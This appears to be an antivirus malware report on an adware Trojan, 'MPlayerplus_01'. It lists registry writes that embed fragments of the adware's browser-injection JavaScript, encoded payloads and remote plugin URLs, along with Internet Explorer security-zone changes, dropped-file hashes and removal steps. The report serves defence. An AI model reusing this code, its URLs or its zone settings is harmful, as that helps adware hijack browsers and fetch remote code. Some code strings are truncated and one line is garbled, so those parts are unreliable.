"JavaScript" = "appAPI.isBackground=false;appAPI.tabId=POPUP;appAPI.internal.scope=Consts.SCOPE.POPUP;appAPI.browserAction.setBadgeBackgroundColor=function(a){if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Expected an array but got: (typeof a));return;}if(a.length!==4){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Color array should have 4 members (RGBA));return;}appAPI.internal.message.send({eventName:onSetBadgeColorFromPopup,eventContent:a});};appAPI.browserAction.setBadgeText=function(c,a){var b={};if(typeof c!==string){console.error(appAPI.browserAction.setIcon - Invalid parameter. Expected string (1st param) but got: (typeof c));return;}b.text=c;if(typeof a===undefined||a===null){b.color=null;}else{if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeText - Invalid parameter. Expected an array (2nd param) but got: (typeof a));return;}else{if(a.length!==4){console.error(appAPI.browserAction.se"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\MPlayerplus_01\Plugins\221]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/icm_downloads_m.js"
[HKCU\Software\MPlayerplus_01\Plugins\220]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/icm_base_m.js"
[HKCU\Software\MPlayerplus_01\Code]
"NewTabJavaScript" = ""
[HKCU\Software\MPlayerplus_01\Plugins\46]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IETimers.js"
[HKCU\Software\MPlayerplus_01\Plugins\91]
"Name" = "monetizationLoader.js"
[HKCU\Software\MPlayerplus_01\Plugins\28]
"Name" = "initializer"
[HKCU\Software\MPlayerplus_01\Plugins\183]
"URL" = "http://js.clientstaticserv.com/plugins/mins/tabsWrapper.js"
[HKCU\Software\MPlayerplus_01\Plugins\155]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTU3ZDY2NTgwYzBlMTMwNDI3MTYwMjU1NTU1YTQ2MTIxMzAwMDI1ZTQxNTgwYzE2MGYxNzA4MWE1YzA3MDExYTQwMWIwMDI5MDIwNjA0MDE0MTEwMGEwZTMwMWIwMDRiMTEwZDBhNGEzMDI1MjcyODI4MjcyMTM2MjczMzJhMjgzYjI5MzIzNjJkMmQyYTI4MzA1YzE0MTMwMzQ5MzEzNjNkMjUyYjI4NDIwZTFlMDQxNzU5MDcxOTA1MWYwNzBlNDU1ODc4NmQ0YzA3MDMwZjAzMTMwOTNkMTY0NjU0NTc1ZTRmNTE1NjZkNTQ1MjQ0NGU1NTE5MWYxNjBlMGUxNzEzMDg0YzRkNGYyMTQ2MGEwODA0MDE0NjMzN2QxMg==', 'nwozdzgtrd'); }"
[HKCU\Software\MPlayerplus_01\Plugins\226]
"JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[226] = function() { if (appAPI.internal.monetization.loader && appAPI.internal.monetization.loader.setCampaignId) { appAPI.internal.monetization.loader.setCampaignId(1026); }};"
[HKCU\Software\MPlayerplus_01\Plugins\3]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie8_fix_2.js"
[HKLM\SOFTWARE\MPlayerplus_01\IE\Profiles]
"S-1-5-21-1844237615-1960408961-1801674531-1003" = "1"
[HKCU\Software\MPlayerplus_01\Plugins]
"PopupPluginList" = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,207,47,182,72,94"
[HKCU\Software\MPlayerplus_01\Plugins\221]
"Name" = "icm_downloads_m"
[HKCU\Software\MPlayerplus_01\Plugins\91]
"JavaScript" = "(function(i){var l=05-08;if(!appAPI.isBackground&&appAPI.dom&&appAPI.dom.isIframe()){return;}var t=appAPI.utils.MD5;if(!t||!t.encode){t={};t.encode=function(H){return H;};}if(typeof appAPI.internal.monetization===undefined){appAPI.internal.monetization={};}var C=appAPI.utils;var F={DBNamespace:monetization_plugin_,RULS_JSON_NAMESPACE: rules_,MONETIZATION_PLUGINS_IDS:monetization_plugins_ids,IS_INSTALL_REPORTED:is_install_reported_,STATS_NAMESPACE:stats_,PLUGINS_VERSION:plugins_version_,GEO_URL:http://ipgeoapi.com/,BASE_DATE:new Date(2013,0,1),updateInterval:1000*60*60*6,rulesJsonHostUrl:http://app.clientstaticserv.com/monetization_campaigns/,statsHostUrl:http://logs.clientstaticserv.com/monetization.gif?,errorHostUrl:http://errors.clientstaticserv.com/monetization-error.gif?,countryName:,reportQueryString:,subID:000000000000000000,reportEvents:{installEventId:0,dailyEventId:1,vertical:2,runningPlugins:6,installVertical:13,impressionsEventId:31,newAllowedVertical:32,policyAppDefuI'"
[HKCU\Software\MPlayerplus_01\Plugins\35]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEAjax.js"
[HKCU\Software\MPlayerplus_01\Manifest]
"UpdateInterval" = "360"
[HKCU\Software\MPlayerplus_01\Plugins\46]
"Name" = "IETimers"
[HKCU\Software\MPlayerplus_01\Plugins\244]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGQ3ODZiNTgwZjFmMTMxODI0MDUxYTUwNTg1YTQ1MDMxMzFjMDE0ZDU5NWQwNzAyMTM1YTQ5MGQxZjEwMTcxNTA3MDMwNjQ1MDQwNzFjNTgwMTFiMDYxZDAyMWY0ODAxMWYxZDEzMTExNjI1MTQxYjA2MWExYTU4MWYxYzA4MjUxNDFiMTUwMzJlMDQwMjEzMTAwZTAyMTk0OTAyMDI0ODA2MWIwNjQ3MmIzZjIyMWIzZTMzMzc0MzJkM2UzNjE4MmEwMjE2NDQzYjE4MmIwOTI5MmYwNDVjM2UyMzM3NTc1MTNlNDExODEyMGExODEzNGIyZDNkMzkzNTI0MzQzYjIzM2UzMjM3MzAyNTM0M2UyNTM3MzgzMzI5MmQ0MDU2NmQ2MjQ1MTgxZDAyMTExYjBjMzMwMzQ5NWQ0ODQzNDM0Mjc4MWY=', 'vrbzgkghqw'); }"
[HKCU\Software\MPlayerplus_01\Plugins\21]
"URL" = "http://js.clientstaticserv.com/plugins/mins/debug.js"
[HKCU\Software\MPlayerplus_01\Plugins\94]
"Version" = "2"
[HKCU\Software\MPlayerplus_01\Plugins\2]
"Version" = "2"
[HKCU\Software\MPlayerplus_01\Plugins\191]
"Version" = "5"
[HKCU\Software\MPlayerplus_01\Plugins\4]
"Name" = "jquery_1_7_1"
[HKCU\Software\MPlayerplus_01\Plugins\35]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Plugins\211]
"Version" = "3"
[HKCU\Software\MPlayerplus_01\Plugins\242]
"Name" = "price_gong_m"
[HKCU\Software\MPlayerplus_01\Plugins\244]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/engageya_inner_m.js"
[HKCU\Software\Crossrider]
"Bic" = "EAEB041DFB674B59BB4BCF5DE150DAB5IE"
[HKCU\Software\MPlayerplus_01\Plugins\13]
"Version" = "7"
[HKCU\Software\MPlayerplus_01\Manifest]
"IsButtonEnabled" = "false"
[HKCU\Software\MPlayerplus_01\Installer]
"CodeDownloadDomain" = "http://js.clientstaticserv.com"
[HKCU\Software\MPlayerplus_01\Plugins\93]
"Name" = "superfish_no_coupons_m"
[HKCU\Software\MPlayerplus_01\Plugins\42]
"JavaScript" = "var Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof appAPI===undefined){appAPI={};}appAPI.__should_activate_validation__=true;(function(a){if(typeof window==undefined){window={};}if(typeof window.document===undefined){window.document={};document=window.document;}if(typeof window.alert===undefined){window.alert=function(b){var c;if(typeof b===undefined){c=undefined;}else{if(b===null){c=null;}else{c=b.toString();}}if(typeof c===string){a.alert(c);}};alert=window.alert;}})(appAPIinternal);if(typeof console===undefined){window.console={};console=window.console;}if(typeof console.log===undefined){window.console.log=function(a){};console.log=window.console.log;}if(typeof console.info===undefined){window.console.info=function(a){};console.info=window.console.info;}if(typeof console.warn===undefined){window.console.warn=function(a){};console.warn=window.console.warn;}if(typeof console.error===undefined){window.console.error=function(a){};console.error=window.console.error;"
[HKCU\Software\MPlayerplus_01\Plugins\36]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.isBackground=true;appAPI.tabId=BG;appAPI.internal.scope=Consts.SCOPE.BACKGROUND;appAPI.openURL=function(c,b){if(typeof c===undefined){return;}var a;if(typeof c===object){a=c;}else{a={url:c,where:b};}appAPI.internal.message.send({eventName:openURL,eventContent:a});};appAPI.internal.runHelper=function(a){if(typeof a!==string){console.error(appAPI.runHelper - Invalid parameter. Expected string (1st param) but got: (typeof a));return;}appAPI.internal.message.send({eventName:runHelper,eventContent:a});};window.alert=function(a){a=(a===null?null:a);a=(typeof a===undefined?undefined:a);appAPIinternal.alert(a);};appAPI.internal._isMonitorAPISupported_=function(){return(typeof appAPIinternal.supportMonitor!==undefined);};window.open=function(b,a,d,c){appAPI.internal.message.send({eventName:windowOpen,eveA'"
[HKCU\Software\MPlayerplus_01\Plugins\177]
"Name" = "crossriderDashboard"
[HKCU\Software\MPlayerplus_01\Plugins\233]
"Version" = "3"
[HKCU\Software\MPlayerplus_01\Plugins\64]
"Version" = "3"
[HKCU\Software\MPlayerplus_01\Plugins\38]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IECallbacks.js"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCU\Software\MPlayerplus_01\Manifest]
"PublisherId" = "21636"
[HKCU\Software\MPlayerplus_01\Plugins\9]
"JavaScript" = "appAPI.hooks.addHook(searchEngine,(function(a){return function(){var f={keyDelay:1000},e,h;return{init:function(i){e=this;this.addEngine({name:google,url:google,input:input[name=q],results:#rso,result:'
[HKCU\Software\MPlayerplus_01\Manifest]
"UninstallerOfferAction" = "NA"
[HKCU\Software\MPlayerplus_01\Plugins\104]
"URL" = "http://js.clientstaticserv.com/plugins/javascripts/monetization/geo/jollywallet_m.js"
[HKCU\Software\MPlayerplus_01\Plugins\211]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/revizer_ws_dynamic_b2b_light_m.js"
[HKLM\SOFTWARE\MPlayerplus_01\IE]
"TotalProfiles" = "1"0?0:>0>10?0>
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process 772406a5-70fe-462f-841c-e18bdccbdc78-2.exe:2848 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DE D2 FD 9C 6A 45 BB 67 7E 29 3F 0B A9 76 71 17"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{11111111-1111-1111-1111-110511421146}" = "1"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{981FDCE3-5912-4D50-A786-2E425268440}]
"AppName" = "772406a5-70fe-462f-841c-e18bdccbdc78-2.exe-buttonutil.exe"
"Policy" = "3"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E55C3E03-2C2F-48B8-A9DD-902CB844E}]
"Policy" = "3"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{531B4925-FB1F-48E9-A556-5B8FD9E9C7C}]
"Policy" = "3"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{BB55C102-1126-4D5D-A6A7-604BA42E4ED4}]
"Policy" = "3"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{981FDCE3-5912-4D50-A786-2E425268440}]
"AppPath" = "%Program Files%\MPlayerplus_01"
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
"{11111111-1111-1111-1111-110511421146}" = ""
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{531B4925-FB1F-48E9-A556-5B8FD9E9C7C}]
"AppPath" = "%Program Files%\MPlayerplus_01"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{BB55C102-1126-4D5D-A6A7-604BA42E4ED4}]
"AppPath" = "%Program Files%\MPlayerplus_01"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E55C3E03-2C2F-48B8-A9DD-902CB844E}]
"AppPath" = "%Program Files%\MPlayerplus_01"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{BB55C102-1126-4D5D-A6A7-604BA42E4ED4}]
"AppName" = "772406a5-70fe-462f-841c-e18bdccbdc78-2.exe-helper.exe"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E55C3E03-2C2F-48B8-A9DD-902CB844E}]
"AppName" = "772406a5-70fe-462f-841c-e18bdccbdc78-2.exe-codedownloader.exe"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{531B4925-FB1F-48E9-A556-5B8FD9E9C7C}]
"AppName" = "772406a5-70fe-462f-841c-e18bdccbdc78-2.exe-buttonutil64.exe"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
"Timestamp"
The process 3a2f274a-d35f-47ab-8ca2-11bebfe38097.exe:852 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4F A3 6C D9 D2 D5 2F 2F FD E3 12 62 D8 26 93 1B"
Dropped PE files
| MD5 | File path |
|---|---|
| fc3b939dc80c80895e6076f544af97fa | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\3a2f274a-d35f-47ab-8ca2-11bebfe38097.exe |
| 03114dadbd9977fc823f95b21fb987e7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.246345\GoogleCrashHandler.exe |
| d858ba2ee718b1db1ced20646e641d08 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.246345\GoogleUpdate.exe |
| f98de4108614e4bb81e95e58e36c7000 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.246345\GoogleUpdateBroker.exe |
| 7e767b342e55eb1dfd74a65d24ea4b70 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.246345\GoogleUpdateOnDemand.exe |
| e451d460727b0c455aed29a2e29e6bdf | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.246345\goopdate.dll |
| 1a6276a81911feac20613b87d29a0a57 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.246345\goopdateres_en.dll |
| 109eec9108abaa66c1a67f68b6116379 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.246345\npGoogleUpdate4.dll |
| fefef2f226fd6be184bc4a3378b02aaf | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.246345\psmachine.dll |
| 8d90bb3a36521b50d0e512a781e36871 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.246345\psuser.dll |
| 44b45aa2f17e5cef5fe5ce06d4e29128 | c:\Program Files\MPlayerplus_01\772406a5-70fe-462f-841c-e18bdccbdc78-2.exe |
| 45100a9e32472cafe3a1dba82ea01a79 | c:\Program Files\MPlayerplus_01\772406a5-70fe-462f-841c-e18bdccbdc78-3.exe |
| 2f2d67ca42e1d89fb52fee78dfb14d7f | c:\Program Files\MPlayerplus_01\772406a5-70fe-462f-841c-e18bdccbdc78-4.exe |
| 0e7dce35cf62340e570858af2257cca5 | c:\Program Files\MPlayerplus_01\772406a5-70fe-462f-841c-e18bdccbdc78-5.exe |
| 558ab1192a852c50c699e2e2b2cc293e | c:\Program Files\MPlayerplus_01\MPlayerplus_01-bg.exe |
| f5e9bd82988844ff01c713f737cd2aca | c:\Program Files\MPlayerplus_01\MPlayerplus_01-bho.dll |
| 6e2aba5b014b564b51fcf02652253c95 | c:\Program Files\MPlayerplus_01\MPlayerplus_01-codedownloader.exe |
| b1675e8afbeb32ee818da2904328666c | c:\Program Files\MPlayerplus_01\Uninstall.exe |
| bc343027044449a5187452edcd9c027e | c:\Program Files\MPlayerplus_01\utils.exe |
| 03114dadbd9977fc823f95b21fb987e7 | c:\Program Files\globalUpdate\Update\1.3.25.0\GoogleCrashHandler.exe |
| d858ba2ee718b1db1ced20646e641d08 | c:\Program Files\globalUpdate\Update\1.3.25.0\GoogleUpdate.exe |
| f98de4108614e4bb81e95e58e36c7000 | c:\Program Files\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe |
| 7e767b342e55eb1dfd74a65d24ea4b70 | c:\Program Files\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe |
| e451d460727b0c455aed29a2e29e6bdf | c:\Program Files\globalUpdate\Update\1.3.25.0\goopdate.dll |
| 1a6276a81911feac20613b87d29a0a57 | c:\Program Files\globalUpdate\Update\1.3.25.0\goopdateres_en.dll |
| 109eec9108abaa66c1a67f68b6116379 | c:\Program Files\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll |
| fefef2f226fd6be184bc4a3378b02aaf | c:\Program Files\globalUpdate\Update\1.3.25.0\psmachine.dll |
| 8d90bb3a36521b50d0e512a781e36871 | c:\Program Files\globalUpdate\Update\1.3.25.0\psuser.dll |
| d858ba2ee718b1db1ced20646e641d08 | c:\Program Files\globalUpdate\Update\GoogleUpdate.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
GoogleUpdate.exe:2460
GoogleUpdate.exe:756
GoogleUpdate.exe:2652
GoogleUpdate.exe:2296
GoogleUpdate.exe:1288
GoogleUpdate.exe:2364
GoogleUpdate.exe:2356
772406a5-70fe-462f-841c-e18bdccbdc78-3.exe:1540
Iufkopcpdfjpcg.exe:424
MPlayerplus_01-bg.exe:2776
772406a5-70fe-462f-841c-e18bdccbdc78-4.exe:2112
%original file name%.exe:688
regsvr32.exe:2736
dwwin.exe:3088
MPlayerplus_01-codedownloader.exe:2344
MPlayerplus_01-codedownloader.exe:2224
772406a5-70fe-462f-841c-e18bdccbdc78-2.exe:2848 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\Cab9.tmp (54 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\C3E814D1CB223AFCD58214D14C3B7EAB (220 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarA.tmp (2712 bytes)
%WinDir%\Tasks\globalUpdateUpdateTaskMachineUA.job (898 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll (1281 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleCrashHandler.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8BD11C4A2318EC8E5A82462092971DEA (477 bytes)
%WinDir%\Tasks\globalUpdateUpdateTaskMachineCore.job (894 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabB.tmp (56 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab7.tmp (54 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe (46 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\psuser.dll (673 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\goopdateres_en.dll (26 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\C3E814D1CB223AFCD58214D14C3B7EAB (341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarC.tmp (2784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar8.tmp (2712 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateHelper.msi (32 bytes)
%Program Files%\globalUpdate\Update\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (56 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8BD11C4A2318EC8E5A82462092971DEA (208 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp (352077 bytes)
%Program Files%\MPlayerplus_01\MPlayerplus_01-bg.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsisos.dll (5 bytes)
%Program Files%\MPlayerplus_01\MPlayerplus_01-bho.dll (3361 bytes)
%Program Files%\MPlayerplus_01\772406a5-70fe-462f-841c-e18bdccbdc78-4.exe (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\21.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\1.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\182.js (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\45.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\userCode\extension.js (734 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\102.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\253.js (769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\7.js (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\39.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\36.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\40.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\2.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\4.js (3312 bytes)
%Program Files%\MPlayerplus_01\MPlayerplus_01-codedownloader.exe (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\252c_appcompat.txt (4124 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\247798 (258822 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\191.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\78.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\43.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\3.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\goopdate.dll (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\13.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\94.js (1 bytes)
%WinDir%\Tasks\772406a5-70fe-462f-841c-e18bdccbdc78-4.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\211.js (797 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\64.js (2 bytes)
%Program Files%\MPlayerplus_01\1293297481.mxaddon (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\manifest.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\91.js (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\207.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\InstallerUtils.dll (25824 bytes)
%Program Files%\MPlayerplus_01\MPlayerplus_01.ico (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\46.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\GoogleUpdateOnDemand.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\14.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\155.js (449 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\44.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\183.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\72.js (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\244.js (501 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\42.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\242.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\246.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\System.dll (11 bytes)
%Program Files%\MPlayerplus_01\utils.exe (66998 bytes)
%Program Files%\MPlayerplus_01\772406a5-70fe-462f-841c-e18bdccbdc78-2.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\md5dll.dll (6 bytes)
%Program Files%\MPlayerplus_01\360-54246.crx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\update[1].json (39 bytes)
%Program Files%\MPlayerplus_01\772406a5-70fe-462f-841c-e18bdccbdc78-5.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\GoogleUpdateBroker.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\psuser.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\190.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\184.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\103.js (2 bytes)
%Program Files%\MPlayerplus_01\54246.xpi (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\221.js (383 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\userCode\background.js (429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\93.js (793 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\psmachine.dll (673 bytes)
%WinDir%\Tasks\772406a5-70fe-462f-841c-e18bdccbdc78-2.job (70 bytes)
%Program Files%\MPlayerplus_01\background.html (729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\22.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\ExecDos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3a2f274a-d35f-47ab-8ca2-11bebfe38097.exe (3312 bytes)
